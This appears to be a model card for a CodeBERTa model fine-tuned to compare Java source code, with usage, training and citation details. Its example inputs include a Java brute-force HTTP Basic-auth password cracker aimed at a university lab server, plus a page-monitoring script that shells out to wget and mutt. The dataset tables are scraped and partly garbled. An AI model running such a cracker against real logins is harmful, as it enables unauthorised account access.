Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks
Paper
•
1908.10084
•
Published
•
9
This is a sentence-transformers model finetuned from huggingface/CodeBERTa-small-v1 on the soco_java dataset. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: RobertaModel
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
First install the Sentence Transformers library:
pip install -U sentence-transformers
Then you can load this model and run inference.
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/CodeBERTa-small-v1-SOCO-Java-SoftmaxLoss")
# Run inference
sentences = [
'\nimport java.util.*;\nimport java.io.*;\nimport java.net.*;\n\nclass BruteForce\n{\n\n public static void main (String a[])\n {\n \n final char [] alphabet = {\n \'A\', \'B\', \'C\', \'D\', \'E\', \'F\', \'G\', \'H\',\n \'I\', \'J\', \'K\', \'L\', \'M\', \'N\', \'O\', \'P\',\n \'Q\', \'R\', \'S\', \'T\', \'U\', \'V\', \'W\', \'X\',\n \'Y\', \'Z\', \'a\', \'b\', \'c\', \'d\', \'e\', \'f\',\n \'g\', \'h\', \'i\', \'j\', \'k\', \'l\', \'m\', \'n\',\n \'o\', \'p\', \'q\', \'r\', \'s\', \'t\', \'u\', \'v\',\n \'w\', \'x\', \'y\', \'z\'};\n\n String pwd="";\n \n for(int i=0;i<52;i++)\n {\n for(int j=0;j<52;j++)\n {\n for(int k=0;k<52;k++)\n {\n pwd = alphabet[i]+""+alphabet[j]+""+alphabet[k];\n String userPassword = ":"+pwd;\n RealThread myTh = new RealThread(i,userPassword);\n Thread th = new Thread( myTh );\n th.start();\n try\n {\n \n \n th.sleep(100);\n }\n catch(Exception e)\n {} \n }\n }\n }\n\n\n}\n\n\n}\n\n\nclass RealThread implements Runnable\n{\n private int num;\n private URL url;\n private HttpURLConnection uc =null;\n private String userPassword;\n private int responseCode = 100;\n public RealThread (int i, String userPassword)\n {\n try\n {\n url = new URL("http://sec-crack.cs.rmit.edu./SEC/2/");\n }\n catch(Exception ex1)\n {\n }\n num = i;\n this.userPassword = userPassword;\n\n }\n \n public int getResponseCode()\n {\n\n return this.responseCode;\n }\n\n public void run()\n {\n try\n {\n String encoding = new url.misc.BASE64Encoder().encode (userPassword.getBytes());\n\n uc = (HttpURLConnection)url.openConnection();\n uc.setRequestProperty ("Authorization", " " + encoding);\n System.out.println("Reponse = "+uc.getResponseCode()+"for pwd = "+userPassword);\n this.responseCode = uc.getResponseCode();\n \n if(uc.getResponseCode()==200)\n {\n System.out.println(" ======= Password Found : "+userPassword+" ========================================= ");\n System.exit(0);\n }\n\n }\n catch (Exception e) {\n System.out.println("Could not execute Thread "+num+" ");\n }\n }\n\n}\n',
'import java.io.BufferedReader;\nimport java.io.FileInputStream;\nimport java.io.IOException;\nimport java.io.InputStreamReader;\nimport java.util.Date;\nimport java.util.Properties;\n\nimport javax.mail.Message;\nimport javax.mail.Session;\nimport javax.mail.Transport;\nimport javax.mail.Message.RecipientType;\nimport javax.mail.internet.InternetAddress;\nimport javax.mail.internet.MimeMessage;\n\n\n\n\npublic class Mailsend\n{\n static final String SMTP_SERVER = MailsendPropertyHelper.getProperty("smtpServer");\n static final String RECIPIENT_EMAIL = MailsendPropertyHelper.getProperty("recipient");\n static final String SENDER_EMAIL = MailsendPropertyHelper.getProperty("sender");\n static final String MESSAGE_HEADER = MailsendPropertyHelper.getProperty("messageHeader");\n\n\n\t\n\n\tpublic static void main(String args[])\n\t{\n\t\ttry\n\t\t{\n\t\t\t\n\t\t\tString smtpServer = SMTP_SERVER;\n\t\t\tString recip = RECIPIENT_EMAIL;\n\t\t\tString from = SENDER_EMAIL;\n\t\t\tString subject = MESSAGE_HEADER;\n\t\t\tString body = "Testing";\n\n\t\t\tSystem.out.println("Started sending the message");\n\t\t\tMailsend.send(smtpServer,recip , from, subject, body);\n\t\t}\n\t\tcatch (Exception ex)\n\t\t{\n\t\t\tSystem.out.println(\n\t\t\t\t"Usage: java mailsend"\n\t\t\t\t\t+ " smtpServer toAddress fromAddress subjectText bodyText");\n\t\t}\n\n\t\tSystem.exit(0);\n\t}\n\n\n\t\n\tpublic static void send(String smtpServer, String receiver,\tString from, String subject, String body)\n\n\t{\n\t\ttry\n\t\t{\n\t\t\tProperties props = System.getProperties();\n\n\t\t\t\n\n\t\t\tprops.put("mail.smtp.host", smtpServer);\n\t\t\tprops.put("mail.smtp.timeout", "20000");\n\t\t\tprops.put("mail.smtp.connectiontimeout", "20000");\n\n\t\t\t\n\t\t\tSession session = Session.getDefaultInstance(props, null);\n\n\n\t\t\t\n\t\t\tMessage msg = new MimeMessage(session);\n\n\t\t\t\n\t\t\tmsg.setFrom(new InternetAddress(from));\n\t\t\tmsg.setRecipients(Message.RecipientType.NORMAL,\tInternetAddress.parse(receiver, false));\n\n\n\n\t\t\t\n\t\t\tmsg.setSubject(subject);\n\n\t\t\tmsg.setSentDate(new Date());\n\n\t\t\tmsg.setText(body);\n\n\t\t\t\n\t\t\tTransport.send(msg);\n\n\t\t\tSystem.out.println("sent the email with the differences : "+ + "using the mail server: "+ smtpServer);\n\n\t\t}\n\t\tcatch (Exception ex)\n\t\t{\n\t\t\tex.printStackTrace();\n\t\t}\n\t}\n}\n',
'\n\n\n\n\n\nimport java.util.*;\nimport java.io.*;\nimport java.net.*;\n\npublic class Watchdog extends TimerTask\n{\n\tpublic void run()\n\t{\n\t\tRuntime t = Runtime.getRuntime();\n\t \tProcess pr= null;\n\t \tString Fmd5,Smd5,temp1;\n\t \tint index;\n \n\t \ttry\n \t{\n\t\t \n\t\t pr = t.exec("md5sum csfirst.html");\n\n InputStreamReader stre = new InputStreamReader(pr.getInputStream());\n BufferedReader bread = new BufferedReader(stre);\n\t\t \n\t\t s = bread.readLine();\n\t\t index = s.indexOf(\' \');\n\t\t Fmd5 = s.substring(0,index);\n\t\t System.out.println(Fmd5);\n\t\t \n\t\t pr = null;\n\t\t \n\t\t pr = t.exec("wget http://www.cs.rmit.edu./students/");\n\t\t pr = null;\n\t\t \n\t\t pr = t.exec("md5sum index.html");\n\t\t \n\n\t\t InputStreamReader stre1 = new InputStreamReader(pr.getInputStream());\n BufferedReader bread1 = new BufferedReader(stre1);\n\t\t \n\t\t temp1 = bread1.readLine();\n\t\t index = temp1.indexOf(\' \');\n\t\t Smd5 = temp1.substring(0,index);\n\t\t System.out.println(Smd5);\n\t\t\n\t\t pr = null;\n\t\t\n\t\t if(Fmd5 == Smd5)\n\t\t System.out.println(" changes Detected");\n\t\t else\n\t\t {\n\t\t pr = t.exec("diff csfirst.html index.html > report.html");\n\t\t pr = null;\n\t\t \n\t\t try{\n\t\t Thread.sleep(10000);\n\t\t }catch(Exception e){}\n\t\t \n\t\t pr = t.exec(" Message.txt | mutt -s Chnages Webpage -a report.html -x @yallara.cs.rmit.edu.");\n\t\t \n\t\t \n\t\t \n\t\t } \n\t\t \n \t }catch(java.io.IOException e){}\n\t}\n}\t\t\n',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [3, 3]
label, text_1, and text_2| label | text_1 | text_2 | |
|---|---|---|---|
| type | int | string | string |
| details |
|
|
|
| label | text_1 | text_2 |
|---|---|---|
0 |
|
import java.io.; |
0 |
import java.util.; |
"+ hash2); BufferedReader buf = new BufferedReader(new FileReader("/home/k//Assign2/ulist1.txt")); String line=" " ; String line1=" " ; String line2=" "; String line3=" "; String[] cad = new String[10]; executes("./.sh"); int i=0; while ((line = buf.readLine()) != null) { line1="http://www.cs.rmit.edu./students/images"+line; if (i==1) line2="http://www.cs.rmi... |
0 |
|
|
SoftmaxLosslabel, text_1, and text_2| label | text_1 | text_2 | |
|---|---|---|---|
| type | int | string | string |
| details |
|
|
|
| label | text_1 | text_2 |
|---|---|---|
0 |
|
|
0 |
import java.io.; |
|
0 |
|
|
SoftmaxLosseval_strategy: stepsper_device_train_batch_size: 16per_device_eval_batch_size: 16learning_rate: 2e-05num_train_epochs: 1warmup_ratio: 0.1fp16: Trueoverwrite_output_dir: Falsedo_predict: Falseeval_strategy: stepsprediction_loss_only: Trueper_device_train_batch_size: 16per_device_eval_batch_size: 16per_gpu_train_batch_size: Noneper_gpu_eval_batch_size: Nonegradient_accumulation_steps: 1eval_accumulation_steps: Nonetorch_empty_cache_steps: Nonelearning_rate: 2e-05weight_decay: 0.0adam_beta1: 0.9adam_beta2: 0.999adam_epsilon: 1e-08max_grad_norm: 1.0num_train_epochs: 1max_steps: -1lr_scheduler_type: linearlr_scheduler_kwargs: {}warmup_ratio: 0.1warmup_steps: 0log_level: passivelog_level_replica: warninglog_on_each_node: Truelogging_nan_inf_filter: Truesave_safetensors: Truesave_on_each_node: Falsesave_only_model: Falserestore_callback_states_from_checkpoint: Falseno_cuda: Falseuse_cpu: Falseuse_mps_device: Falseseed: 42data_seed: Nonejit_mode_eval: Falseuse_ipex: Falsebf16: Falsefp16: Truefp16_opt_level: O1half_precision_backend: autobf16_full_eval: Falsefp16_full_eval: Falsetf32: Nonelocal_rank: 0ddp_backend: Nonetpu_num_cores: Nonetpu_metrics_debug: Falsedebug: []dataloader_drop_last: Falsedataloader_num_workers: 0dataloader_prefetch_factor: Nonepast_index: -1disable_tqdm: Falseremove_unused_columns: Truelabel_names: Noneload_best_model_at_end: Falseignore_data_skip: Falsefsdp: []fsdp_min_num_params: 0fsdp_config: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}fsdp_transformer_layer_cls_to_wrap: Noneaccelerator_config: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}deepspeed: Nonelabel_smoothing_factor: 0.0optim: adamw_torchoptim_args: Noneadafactor: Falsegroup_by_length: Falselength_column_name: lengthddp_find_unused_parameters: Noneddp_bucket_cap_mb: Noneddp_broadcast_buffers: Falsedataloader_pin_memory: Truedataloader_persistent_workers: Falseskip_memory_metrics: Trueuse_legacy_prediction_loop: Falsepush_to_hub: Falseresume_from_checkpoint: Nonehub_model_id: Nonehub_strategy: every_savehub_private_repo: Nonehub_always_push: Falsegradient_checkpointing: Falsegradient_checkpointing_kwargs: Noneinclude_inputs_for_metrics: Falseinclude_for_metrics: []eval_do_concat_batches: Truefp16_backend: autopush_to_hub_model_id: Nonepush_to_hub_organization: Nonemp_parameters: auto_find_batch_size: Falsefull_determinism: Falsetorchdynamo: Noneray_scope: lastddp_timeout: 1800torch_compile: Falsetorch_compile_backend: Nonetorch_compile_mode: Noneinclude_tokens_per_second: Falseinclude_num_input_tokens_seen: Falseneftune_noise_alpha: Noneoptim_target_modules: Nonebatch_eval_metrics: Falseeval_on_start: Falseuse_liger_kernel: Falseeval_use_gather_object: Falseaverage_tokens_across_devices: Falseprompts: Nonebatch_sampler: batch_samplermulti_dataset_batch_sampler: proportional| Epoch | Step | Training Loss | Validation Loss |
|---|---|---|---|
| 0.0532 | 100 | 0.2015 | 0.0240 |
| 0.1064 | 200 | 0.0143 | 0.0209 |
| 0.1596 | 300 | 0.0241 | 0.0241 |
| 0.2128 | 400 | 0.0174 | 0.0213 |
| 0.2660 | 500 | 0.0228 | 0.0206 |
| 0.3191 | 600 | 0.0061 | 0.0226 |
| 0.3723 | 700 | 0.0194 | 0.0208 |
| 0.4255 | 800 | 0.0193 | 0.0197 |
| 0.4787 | 900 | 0.0261 | 0.0175 |
| 0.5319 | 1000 | 0.0189 | 0.0178 |
| 0.5851 | 1100 | 0.0089 | 0.0188 |
| 0.6383 | 1200 | 0.0174 | 0.0161 |
| 0.6915 | 1300 | 0.0171 | 0.0162 |
| 0.7447 | 1400 | 0.0149 | 0.0155 |
| 0.7979 | 1500 | 0.011 | 0.0164 |
| 0.8511 | 1600 | 0.0308 | 0.0160 |
| 0.9043 | 1700 | 0.0048 | 0.0167 |
| 0.9574 | 1800 | 0.0142 | 0.0164 |
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
Base model
huggingface/CodeBERTa-small-v1